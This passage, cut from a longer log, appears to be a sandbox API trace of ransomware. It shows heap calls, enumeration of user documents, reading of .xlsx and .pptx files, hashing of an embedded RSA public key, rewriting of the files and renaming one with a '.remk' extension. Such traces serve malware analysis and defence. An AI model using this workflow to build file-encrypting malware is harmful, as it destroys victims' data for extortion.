(HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0235.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0235.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0235.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0235.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0235.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0235.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0235.268] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0235.268] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eea78 | out: hHeap=0x630000) returned 1 [0235.268] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0235.268] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eea60 | out: hHeap=0x630000) returned 1 [0235.268] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0235.268] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0235.269] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eeac0 | out: hHeap=0x630000) returned 1 [0235.269] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0235.269] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0235.269] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0235.269] GetCurrentThreadId () returned 0x314 [0235.269] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0235.269] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c4320 [0235.269] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0235.269] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0235.269] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0235.269] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0235.269] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0235.269] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31a4298 [0235.269] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.269] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.269] GetCurrentThreadId () returned 0x314 [0235.269] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.269] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.269] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x3192918 [0235.269] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.269] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.269] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.270] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.270] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0235.270] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0235.270] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0235.270] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0235.270] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0235.270] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0235.270] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0235.270] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eeac0 [0235.270] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0235.270] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0235.270] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0235.270] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0235.270] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0235.270] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0235.270] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0235.270] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0235.270] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eea60 [0235.270] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0235.270] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0235.270] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0235.270] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0235.270] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0235.271] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0235.271] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0235.271] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eea78 [0235.271] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0235.271] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0235.271] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0235.271] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eea48 [0235.271] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0235.271] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eead8 [0235.271] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0235.271] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0235.271] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0235.271] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eeaa8 [0235.271] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0235.271] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eea90 [0235.271] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0235.271] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31eeaf0 [0235.271] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eea90 | out: hHeap=0x630000) returned 1 [0235.271] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31eea90 [0235.271] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eeaa8 | out: hHeap=0x630000) returned 1 [0235.271] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed18 [0235.272] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0235.272] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0235.272] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0235.272] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0235.272] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eea60 | out: hHeap=0x630000) returned 1 [0235.272] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eea60 [0235.272] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0235.272] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0235.272] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eeac0 | out: hHeap=0x630000) returned 1 [0235.272] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0235.272] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eeaf0 | out: hHeap=0x630000) returned 1 [0235.272] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37c0db8 [0235.272] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0235.272] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x72aea0 [0235.272] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0235.272] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0235.272] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eea60 | out: hHeap=0x630000) returned 1 [0235.272] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37c0fd0 [0235.272] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0235.273] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x319bc40 [0235.273] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0235.273] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0235.273] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0235.273] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x319bc40 | out: hHeap=0x630000) returned 1 [0235.273] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0235.273] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0235.273] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0235.273] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0fd0 | out: hHeap=0x630000) returned 1 [0235.273] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0235.273] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0235.273] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eea90 | out: hHeap=0x630000) returned 1 [0235.273] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0235.273] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eead8 | out: hHeap=0x630000) returned 1 [0235.273] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0235.273] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eea78 | out: hHeap=0x630000) returned 1 [0235.273] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eea48 | out: hHeap=0x630000) returned 1 [0235.273] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bddc8 | out: hHeap=0x630000) returned 1 [0235.273] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0235.274] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0235.274] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eea30 | out: hHeap=0x630000) returned 1 [0235.274] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325cb18 | out: hHeap=0x630000) returned 1 [0235.274] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0235.274] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0235.274] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0235.274] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0235.274] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0235.274] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0235.274] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0235.274] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0235.274] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0235.274] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0235.274] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0235.274] WriteFile (in: hFile=0x640, lpBuffer=0x37c6278*, nNumberOfBytesToWrite=0x2e76, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37c6278*, lpNumberOfBytesWritten=0x3adfb14*=0x2e76, lpOverlapped=0x0) returned 1 [0235.274] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c6278 | out: hHeap=0x630000) returned 1 [0235.274] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x2e7b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.275] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0235.275] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0235.275] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0235.275] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0235.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0235.275] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37c0db8 [0235.275] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0235.275] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0235.275] WriteFile (in: hFile=0x640, lpBuffer=0x37c0db8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37c0db8*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0235.275] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0235.275] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0235.275] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0235.275] CloseHandle (hObject=0x640) returned 1 [0235.278] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0235.278] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8c0) returned 0x325d3b0 [0235.278] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0235.278] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\tK5rfTr5kIZSRi.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\tk5rftr5kizsri.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\tK5rfTr5kIZSRi.pptx.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\tk5rftr5kizsri.pptx.remk")) returned 1 [0235.279] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d3b0 | out: hHeap=0x630000) returned 1 [0235.279] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0235.279] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0235.281] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31658e8 | out: hHeap=0x630000) returned 1 [0235.281] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b140760, ftCreationTime.dwHighDateTime=0x1d5e31c, ftLastAccessTime.dwLowDateTime=0xa5f668d0, ftLastAccessTime.dwHighDateTime=0x1d5e7d4, ftLastWriteTime.dwLowDateTime=0xa5f668d0, ftLastWriteTime.dwHighDateTime=0x1d5e7d4, nFileSizeHigh=0x0, nFileSizeLow=0x14780, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ypHLBtyzIYe9W.xlsx", cAlternateFileName="YPHLBT~1.XLS")) returned 1 [0235.281] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e8f8 [0235.281] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xd6) returned 0x31658e8 [0235.281] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e8f8 | out: hHeap=0x630000) returned 1 [0235.281] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\ypHLBtyzIYe9W.xlsx") returned=".xlsx" [0235.281] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\ypHLBtyzIYe9W.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\yphlbtyziye9w.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0235.291] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=83840) returned 1 [0235.291] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0235.293] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x1475a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.293] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0235.295] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0235.295] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0235.295] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0235.295] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x14780, lpOverlapped=0x0) returned 1 [0235.297] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.297] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0235.297] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.297] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.297] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0235.298] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0235.298] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0235.298] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0235.298] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0235.298] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0235.299] GetLastError () returned 0x0 [0235.299] CryptDestroyHash (hHash=0x31de170) returned 1 [0235.299] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0235.299] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0235.299] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0235.299] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0235.299] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0235.299] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0235.299] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0235.299] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0235.299] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14780) returned 0x37c6278 [0235.300] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0235.300] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0235.300] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0235.300] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0235.300] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0235.300] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0235.300] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325cb18 [0235.300] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eea30 [0235.300] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325cb60 [0235.300] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eea48 [0235.300] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eea78 [0235.300] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eead8 [0235.300] RtlAllocateHeap (HeapHandle=0x630000, 